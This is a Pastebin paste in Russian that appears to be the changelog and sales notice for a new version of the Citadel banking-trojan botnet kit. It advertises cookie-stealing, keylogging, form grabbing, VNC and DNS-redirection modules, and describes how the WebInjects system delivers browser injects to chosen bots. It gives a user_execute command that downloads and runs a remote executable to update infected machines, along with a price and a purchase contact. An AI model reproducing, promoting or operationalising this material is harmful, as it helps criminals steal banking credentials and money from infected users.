Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Самые современные средства и инструменты для профессиональной работы собраны специально для вас в новой версии.
- Решены проблемы с отстуком и живучестью, работа стала еще приятнее, учтены самые важные пожелания.
- Взят во внимание весь опыт работы за последний сезон, новичкам будет гораздо проще работать с новой версией, чем с предыдущими.
- Теперь открыта в свободном доступе новая технология WebInjects для всех желающих.
- [+] Сделана быстрая проверка ботов на Online-статус, списком на главной странцие.
- [+] Возможность добавить бота в "Избранное" без отчетов.
- [+] Сделано детектирование привилегий в системе(admin/user), отображается в "Информация о боте: [Флаги]"
- [+] Сортировка скриншотов по дате.
- [+] Добавлена возможность подключения других БД Citadel (как удаленные БД, так и старые/отключенные админки) для поиска отчетов.
- [+] Расширен поиск в БД: можно указывать стоп-слова, например twitter.com, которые будут отсутствовать при выдаче результатов, чтобы не засорять логи мусором. Также, можно указать поиск не по содержимому отчета, а по URL Mask, это увеличивает скорость поиска данных.
- [+] Расширен Jabber уведомитель, добавлены следущие события:
- - Маски BotID на событие "Бот вышел в Online"
- - Уведомление при обнаружении конкретного ПО из "installed software"
- - Маска на содержимое CMD отчета.
- - Параллельная удобная запись в log-файл всех событий, помимо Jabber-уведомлений.
- [+] Добавлен бесплатный модуль граббинга кукисов в Firefox, экспортирует все cookies из браузера и отсылает вам.
- [+] Исправлена ошибка удаления отчетов.
- [+] Авто-обновление статистики главной страницы.
- [+] Кнопка [Decode] на отчетах, которая позволяет декодировать urlencode(%0D) последовательности в удобный вид.
- [+] Добавлена возможность определения online/offline статуса у бота в API.
- [+] Полностью переделан алгоритм проверки в модуле WebSocks.
- [+] Отображение скриптов(команд) постранично.
- [+] Добавлена возможность отсылки сообщений на jabber через api.php (использует ваши персональные настройки в админке)
- [+] Теперь при каждом HTTP/HTTPS отчете, добавляются cookies(Firefox/IE), а также заголовки:
- [+] Полностью переделан внутренний алгоритм шифрования, отстук во много раз выше, живучесть дольше. Для переноса ботов на новую версию, выполняем команду user_execute http://www.host.com/1351.exe. RC4 ключ должен совпадать.
- [+] Корректировка Browser Keylogger'a. Автоматически добавляются пробел, если с момента последнего нажатия клавиши прошло 5 секунд, необходимо для визуального разделения input-полей.
- [+] Исправлен недочет с 302 редиректом, когда не срабатывал инжект, если осуществлялся переход по ссылке через javascript.
- [+] Plaintext логи открываются в новой вкладке.
- [+] Исправлена ошибка пропадания ботов из онлайна при включенном GeoIP.
- [+] Отображение комментария к боту в VNC-модуле при наведении мышки, а также отсылка комментария в jabber вместе с информацией о коннекте.
- [+] Возможность указать в DnsFilters(перенаправление траффика) маски со звездочками (*), можно сделать маску более гибкой.
- [+] WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Модуль работает через админку.
- Краткий ликбез:
- В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
- В разделе ВебИнжекты существуют 2 секции: "Группа вебинжектов" и "Паки", первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
- В главном меню, вразделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только своя группа списка инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельно взятой категории ботов по классу: страна или ботнет.
- В админке создан специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
- Сушествует несколько режимов для паков.
- Dual - когда работает файл с инжектами из основного конфига + вебинжекты.
- Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
- Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
- Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
- В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также, можно поискать DEBUG-отчеты по боту и посмотреть историю компиляций и ошибок вебинжектов.
- Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
- Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя.
- [+] Опция в конфиге disable_httpgrabber расширена и позволяет полностью избавиться от HTTP-отчетов, отправляя на сервер только HTTPS-отчеты со всех браузеров, если установлено значение "1". Избавьтесь от лишней нагрузки на сервер.
- [+] Добавлена секция "HttpVipUrls" в WebFilters, которая позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1).
- [+] Полностью перереботан мануал, теперь удобная навигация + раскрыты некоторые тонкости работы, а также добавлены ответы на популярные вопросы, с примерами. Изменено лицензионное соглашение, которое содержится в мануале.
- Для получения новой версии, размещаем заявку в Jabber'e в таком формате: "<login в CRM> размещаю заявку на получение новой версии". Оплата поддержки должна быть своевременной, те, у кого задолжность более 3 месяцев - новую версию не получают. Срок выдачи от 3 до 72 часов. Если у вас имеется лицензированный партнер или саппорт, сразу пишите об этом в заявке до выдачи, а не после.
- Для старых клиентов, обновление включено в абонентскую плату, для новых, цена базовой комплектации составляет теперь $3931.00
- Jabber для покупки и обновлений: aquabox@lugmen.org.ar
- Саппорт в праве отказать в продаже лицензии без объяснения причины. Поддержка клиентов на уровне сложных технических вопросов отменена из-за большого количества, обменивайтесь опытом с коллегами через CRM либо форумы.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement